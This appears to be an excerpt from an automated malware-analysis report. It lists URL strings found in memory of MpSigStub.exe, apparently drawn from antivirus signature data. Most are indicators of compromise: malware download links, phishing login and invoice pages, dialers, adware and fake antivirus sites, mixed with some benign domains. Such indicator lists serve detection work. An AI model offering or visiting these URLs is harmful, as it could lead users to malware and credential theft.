Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://d.ackng.com/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://d.gameplaylabs.com/ce9237be57719933386c8a88b67bf7a5/install.xml?pid=
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://d.robints.us/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://d.sogou.com/music.so?query=%s
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://d.xmapps.net/i.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://d1.downxia.net/products/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://d1hxtl9znqwejj.cloud
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://d2.3dprotect.net:90/update/?id=%d
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://d2hrpnfyb3wv3k.cloudfront.net
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://d2xpmajse0mo96.cloudfront.net/app/ver/ssl.php
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://d4uk.7h4uk.com/w_case/login.php
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://dafshare-org.eu.paccar.com
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://dailypictur.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://dailytop10tracker.com/important-please-read/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://danielflors.com/question/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://darling4sil.5gbfree.com/companyprofile.zip
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://data1.yoou8.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://dataoffice.zapto.org
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://dec.ip3366.net/api/?key=20171119174239256&getnum=99999&proxytype=0
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://default.home
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://defaultincoming.mangospot.net/prf/reg.dot
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://delta-akb.ru/image/data/goods/dtm/.../log.php?f=404
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://deluvis.net/
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://demo.sabkura.com/overdue-payment/
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://designte.com/shop?abc=cgdpzd04jni9oc4y
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://det-colors.ru/invoice-number-09203/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://dev.northzone.it/ds/2312.gif
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&amp;i=1a3a1a
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net-oupdate.exe
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://df20.dot5hosting.com/~shitshir
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://dgdsgweewtew545435.tk
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://dhm-mhn.com/htamandela.hta
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://dialers.netcollex.net/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.bunm.de/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.comonline.net/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.dnibv.com/
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?x
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/dialup.pl
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/cf
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://dickswingsgrill.com?
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://dintandnesin.ru/april/view.php?id=
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/x
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://discoverberts.com.au/dav//assets/checkapp1.php
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://discovirtual.terra.com.br/vdmain.shtml
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://disk.karel
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://disk.karelia.pro/2adftYz/392.png
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://dl.%s/get/?pin=%s&lnd=%s
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp String found in binary or memory: http://dl.360safe.com/gf/360ini.cab
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://dl.dqwjnewkwefewamail.com/
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/u/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_ax
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://dl.pipi.cn/pipi_dae_
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://dl.static.iqiyi.com/hz/IQIYIsetup_senxing
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exe
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exex
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/dotnetfx
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://dld.rewinup.com/dotnetfx
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://dmww.dmcast.com/script/update.asp?version=%s
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://dmzeventsbali.com/images/usps/usps/label.htm
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://dns.cyberium.cc/script/
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://do.crionn.com/ola.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dllregsvr32
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://docs.herobo.com
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/presalepage/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://doctorantivirus2008a.com/support.php
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/KYSTBANEN.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/Telefoncomputernes9.exe
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://dolfy.sedonahyperbarics.com:8080/keyboard_shortcut.js
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://domainserver.co.kr
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp String found in binary or memory: http://down.anhuiry.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://down.emoney.cn/wl
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://down.firmsoar.com/Fastaide_1160.exe
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://down.kuwo.cn/mbox/kuwo_jm634.exe
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://down.namepics.info/install.php?name=
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://down2.uc.cn/pcbrowser/down.php?pid=4396
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://download-n-save.com
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://download-the-files.com/tplc/cdc
Source: MpSigStub.exe, 00000023.00000003.18350289745.0000015B1B712000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com%s&u=%u&advid=00000000&p=%u
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/
Source: MpSigStub.exe, 00000023.00000003.18300098662.0000015B1C3F4000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/124.php?&advid=00000
Source: MpSigStub.exe, 00000023.00000003.18300098662.0000015B1C3F4000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/madownload.php?&advid=00000000&u=%u&p=%u&lang=______
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://download.contextplus.net/shared/Msvcp60Installer.exe
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://download.cpudln.com
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://download.driverupdate.net/DriverUpdate-setup.msi.bz2x
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://download.enet.com.cn/search.php?keyword=%s
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://download.kaobeitu.com/kaobeitu/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://download.m
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://download.phpnuke.org/installers/extra_software/coupish/coupish-x
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://download.powercreator
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://download.seznam.cz/update
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://download.softobase.com/ru/
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://download.softobase.com/ru/xL
Source: MpSigStub.exe, 00000023.00000003.18300098662.0000015B1C3F4000.00000004.00000001.sdmp String found in binary or memory: http://download.spy-shredder.com/ssdownload.php?&advid=00001322&u=%u&p=%u&lang=________&vs=%u&%s
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/Dnl/T_
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/Tb
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/dnl/T
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/cdsearch/
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/msstat/dealip.asp?aa=%s&bb=%s&cc=%s&dd=%s&ee=%d&ff=%ld&gg=%
Source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/routeway/dealsetup.asp?aa=%s&bb=%s&cc=%s&dd=%s
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://download.zjsyawqj.cn/jjbq/setup_jjbq_jjbq03nodkpk_v1.0_silent.exe
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://download1.ihyip.pw/
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://download1.microliteupdate.net/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://download2.mybrowserbar.com/kits/hlp/exthelper.exe
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://downloader.aldtop.com
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://downloadfile.xyz/mine/run.js
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/allfile.jpg
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index2.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index3.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index4.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index5.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://downloads-full.com.br/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://downloads.180solutions.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://downtown.crstycricri.net/pc/page/set_reg.php?af_code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp String found in binary or memory: http://downza.cn
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://dr-woelfl.de/invoice-for-you/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://driversearch.space
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://drm.ysbweb.com/v1.aspx?id=65181__asf_license_url_ends_here__
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://droobox.online/luncher.doc
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://dropboxservices.isaihost.com/dropbox/drop/dropbox.html)
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://drpuneetchawla.com/cli/adbe/login.html
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://dtrack.secdls.com
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://dudethisishowwedoitallnightlong.2myip.net
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://dvd2ipad.net/media2
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://dw.mtsou.com/
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://dw.mtsou.com/_
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://dwaplord2018.tk/doc/purchaseorder.doc
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://dx.mastacash.com
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://dxcodec.com/uninstall/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://dz-site.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://e223pg.awardspace.co.uk/up.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://eastman.smritiphotography.in/#ywhvzgdlc0blyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ebsuggester.com/redirect-new-logon-alert/redirect.htm
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://economycrown.com/hahdhdhd/sf-express.php?email=
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://eda.ru/data
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://eduardovolpi.com.br/flipbook/postal/services/parcel)
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://educadorfisicoadinis.com.br/ryan/login%20pdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://egomam.ru/neworder.doc
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://ekey.sdo.com
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://eleonorepack.cn/myexp/getexe.php?spl=javadmjava/io/bufferedoutputstreamjava/io/fileoutputstre
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://elpctchair00.net/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp String found in binary or memory: http://elsword.com/xb
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://employeeportal.net-login.com/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://en.eazel.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://en.v9.com/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://endresactuarial.com/
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://engine.dmccint.com/common/ProcessDump.exe?v=1.0.3.0x
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://enomioms.club/msw/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://erlivia.ltd
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://ermi.co.zw/ds/2312.gif
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://errors.crossrider.com/utility.gif
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapperxk
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://esiglass.it/glassclass/glass.php
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://esmxc01.top/download.php?file=lv.exe
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://esp1k.myddns.me/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://estelaraziel.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://etzhb.000webhostapp.com/read.txt
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://eula.mindspark.com
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://eula.mindspark.com/eula/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://evanstechnology.com
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://events.bittorrent.com/startConversion
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://everbot.pl/cs/reg.php?id=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://ewd96h2.sed.macabrepoe.com
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://excelvba.ru/updates/download.php?addin=Parser
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://exe-1.icu/install2.exe
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://expandingdelegation.top/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://experimental.sitesled.com/wind.jpg
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://explorehere.in/info/new-invoice-
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://f0568929.xsph.ru/po/rexifly.php?
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://f0570495.xsph.ru/files/pdf.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://f1visa.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://faacebookv.tk/reveal.php
